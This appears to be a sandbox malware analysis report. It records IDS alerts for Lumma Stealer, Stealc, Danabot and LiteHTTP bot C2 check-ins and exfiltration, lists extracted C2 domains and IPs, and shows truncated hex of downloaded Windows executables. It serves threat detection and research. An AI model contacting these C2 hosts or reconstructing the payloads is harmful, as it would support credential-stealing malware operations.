Source: Network traffic	Suricata IDS: 2060414 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (foresctwhispers .top) : 192.168.2.4:64912 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2060418 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (seizedsentec .online) : 192.168.2.4:60274 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2060410 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (collapimga .fun) : 192.168.2.4:60174 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2060416 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (quietswtreams .life) : 192.168.2.4:53002 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2060412 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (earthsymphzony .today) : 192.168.2.4:56871 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2060386 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (exarthynature .run in TLS SNI) : 192.168.2.4:49906 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2060422 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (strawpeasaen .fun) : 192.168.2.4:49461 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2060424 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tracnquilforest .life) : 192.168.2.4:51887 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2060386 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (exarthynature .run in TLS SNI) : 192.168.2.4:49898 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2854648 - Severity 1 - ETPRO MALWARE Win32/Danabot CnC Activity (GET) : 192.168.2.4:49919 -> 45.144.212.77:16000
Source: Network traffic	Suricata IDS: 2060386 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (exarthynature .run in TLS SNI) : 192.168.2.4:49918 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.4:49927 -> 185.208.156.162:80
Source: Network traffic	Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.4:49927 -> 185.208.156.162:80
Source: Network traffic	Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.4:49927 -> 185.208.156.162:80
Source: Network traffic	Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.4:49939 -> 185.208.156.162:80
Source: Network traffic	Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.4:49939 -> 185.208.156.162:80
Source: Network traffic	Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.4:49939 -> 185.208.156.162:80
Source: Network traffic	Suricata IDS: 2060386 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (exarthynature .run in TLS SNI) : 192.168.2.4:49938 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.4:49959 -> 185.208.156.162:80
Source: Network traffic	Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.4:49959 -> 185.208.156.162:80
Source: Network traffic	Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.4:49959 -> 185.208.156.162:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49965 -> 45.93.20.28:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49965 -> 45.93.20.28:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 45.93.20.28:80 -> 192.168.2.4:49965
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49965 -> 45.93.20.28:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 45.93.20.28:80 -> 192.168.2.4:49965
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49965 -> 45.93.20.28:80
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49915 -> 104.21.24.225:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49915 -> 104.21.24.225:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49925 -> 104.21.24.225:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49898 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49948 -> 104.21.24.225:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49984 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49984 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49943 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49943 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49863 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49996 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49967 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49938 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49957 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49856 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49856 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50000 -> 104.21.24.225:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: joyfulhezart.tech
Source: Malware configuration extractor	URLs: hardswarehub.today
Source: Malware configuration extractor	URLs: gadgethgfub.icu
Source: Malware configuration extractor	URLs: hardrwarehaven.run
Source: Malware configuration extractor	URLs: techmindzs.live
Source: Malware configuration extractor	URLs: codxefusion.top
Source: Malware configuration extractor	URLs: quietswtreams.life
Source: Malware configuration extractor	URLs: techspherxe.top
Source: Malware configuration extractor	IPs: 176.113.115.6
Source: Malware configuration extractor	IPs: 185.156.73.73
Source: Malware configuration extractor	IPs: 45.91.200.135

Source: unknown

Network traffic detected: DNS query count 42

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 05 Mar 2025 20:59:08 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 05 Mar 2025 20:55:17 GMTETag: "1cc400-62f9e9b507876"Accept-Ranges: bytesContent-Length: 1885184Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d1 b6 42 53 95 d7 2c 00 95 d7 2c 00 95 d7 2c 00 81 bc 2f 01 98 d7 2c 00 81 bc 29 01 2f d7 2c 00 c7 a2 28 01 87 d7 2c 00 c7 a2 2f 01 83 d7 2c 00 c7 a2 29 01 cc d7 2c 00 a4 8b d1 00 97 d7 2c 00 81 bc 28 01 82 d7 2c 00 81 bc 2d 01 86 d7 2c 00 95 d7 2d 00 67 d7 2c 00 59 a2 25 01 94 d7 2c 00 59 a2 d3 00 94 d7 2c 00 59 a2 2e 01 94 d7 2c 00 52 69 63 68 95 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 23 01 bb 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 f2 04 00 00 c0 01 00 00 00 00 00 00 c0 4a 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 4a 00 00 04 00 00 c4 c6 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 e0 06 00 6b 00 00 00 00 d0 06 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 cc ac 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7c ac 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 c0 06 00 00 10 00 00 00 d6 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 88 03 00 00 00 d0 06 00 00 04 00 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 e0 06 00 00 02 00 00 00 ea 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 2a 00 00 f0 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 79 76 74 78 6d 75 61 00 b0 19 00 00 00 31 00 00 b0 19 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 79 79 7a 6f 6b 76 67 00 10 00 00 00 b0 4a 00 00 04 00 00 00 9e 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 4a 00 00 22 00 00 00 a2 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 05 Mar 2025 21:00:11 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 05 Mar 2025 12:14:15 GMTETag: "b75800-62f9753f1efd3"Accept-Ranges: bytesContent-Length: 12015616Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0c 00 56 b9 c8 67 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 2b 00 ba 01 00 00 54 b7 00 00 3e 02 00 25 11 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 10 ba 00 00 04 00 00 3a 38 02 00 03 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 80 04 00 14 0e 00 00 00 b0 04 00 a0 40 b5 00 00 20 02 00 c8 07 00 00 00 00 00 00 00 00 00 00 00 00 ba 00 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 f3 01 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 83 04 00 18 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 b9 01 00 00 10 00 00 00 ba 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 64 61 74 61 00 00 00 00 01 00 00 00 d0 01 00 00 02 00 00 00 be 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 00 00 10 2b 00 00 00 e0 01 00 00 2c 00 00 00 c0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 65 68 5f 66 72 61 6d 04 00 00 00 00 10 02 00 00 02 00 00 00 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 c8 07 00 00 00 20 02 00 00 08 00 00 00 ee 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 78 64 61 74 61 00 00 70 09 00 00 00 30 02 00 00 0a 00 00 00 f6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 62 73 73 00 00 00 00 90 3c 02 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 69 64 61 74 61 00 00 14 0e 00 00 00 80 04 00 00 10 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 00 00 00 00 60 00 00 00 00 90 04 00 00 02 00 00 00 10 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 a0 04 00 00 02 00 00 00 12 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a0 40 b5 00 00 b0 04 00 00 42 b5 00 00 14 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 90 00 00 00 00 00 ba 00 00 02 00 00 00 56 b7 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 05 Mar 2025 21:00:26 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 05 Mar 2025 17:05:13 GMTETag: "c000-62f9b6485affe"Accept-Ranges: bytesContent-Length: 49152Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ce 97 0e c4 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 b4 00 00 00 0a 00 00 00 00 00 00 ee d2 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 9b d2 00 00 4f 00 00 00 00 e0 00 00 80 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 0c 00 00 00 ec d1 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 b2 00 00 00 20 00 00 00 b4 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 80 06 00 00 00 e0 00 00 00 08 00 00 00 b6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 01 00 00 02 00 00 00 be 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 cf d2 00 00 00 00 00 00 48 00 00 00 02 00 05 00 5c 25 00 00 88 1a 00 00 01 00 00 00 07 00 00 06 e4 3f 00 00 08 92 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 fc 00 00 00 01 00 00 11 00 72 01 00 00 70 0a 06 28 01 00 00 06 0b 07 7e 12 00 00 0a 28 13 00 00 0a 13 04 11 04 2c 06 00 38 d6 00 00 00 72 3d 00 00 70 28 02 00 00 06 0c 08 7e 12 00 00 0a 28 13 00 00 0a 13 05 11 05 2c 06 00 38 b4 00 00 00 06 28 14 00 00 0a 0d 00 09 25 13 07 2c 06 11 07 8e 69 2d 06 16 e0 13 06 2b 0b 11 07 16 8f 22 00 00 01 e0 13 06 00 11 06 13 08 11 06 11 08 7b 13 00 00 04 58 13 09 08 11 09 7c 16 00 00 04 7b 25 00 00 04 28 15 00 00 0a 13 0a 11 09 7c 16 00 00 04 7b 21 00 00 04 13 0b 11 0a 11 0b 28 16 00 00 0a 1f 40 12 0c 28 03 00 00 06 26 09 11 09 7c 16 00 00 04 7b 25 00 00 04 11 0a 11 0b 28 17 00 00 0a 00 11 0a 11 0b 28 16 00 00 0a 11 0c 12 0c 28 03 00 00 06 26 28 18 00 00 0a 6f 19 00 00 0a 7e 12 00 00 0a 7e 1a 00 00 0a 28 04 00 00 06 26 00 14 13 07 00 2a 22 02 28 1b 00 00 0a 00 2a 00 00 00 1b 30 06 00 2f 01 00 00 02 00 00 11 00 14 fe 06 09 00 00 06 73 17 00 00 06 14 fe 06 0a 00 00 06 73 1b 00 00 06 14 fe 06 08 00 00 06 73 1f
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 05 Mar 2025 21:00:33 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 03 Mar 2025 08:27:51 GMTETag: "5a400-62f6beea209d2"Accept-Ranges: bytesContent-Length: 369664Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 c4 af c0 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 f4 04 00 00 ac 00 00 00 00 00 00 b0 ba 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 06 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 59 2c 05 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 06 00 d0 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 2d 05 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b1 f2 04 00 00 10 00 00 00 f4 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 07 21 00 00 00 10 05 00 00 22 00 00 00 f8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 10 d1 00 00 00 40 05 00 00 50 00 00 00 1a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 d0 39 00 00 00 20 06 00 00 3a 00 00 00 6a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 05 Mar 2025 21:00:38 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 05 Mar 2025 20:55:03 GMTETag: "eaa00-62f9e9a794385"Accept-Ranges: bytesContent-Length: 961024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 04 ba c8 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 fa 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 00 0f 00 00 04 00 00 70 8b 0f 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 44 3e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0e 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 44 3e 01 00 00 40 0d 00 00 40 01 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 80 0e 00 00 76 00 00 00 34 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
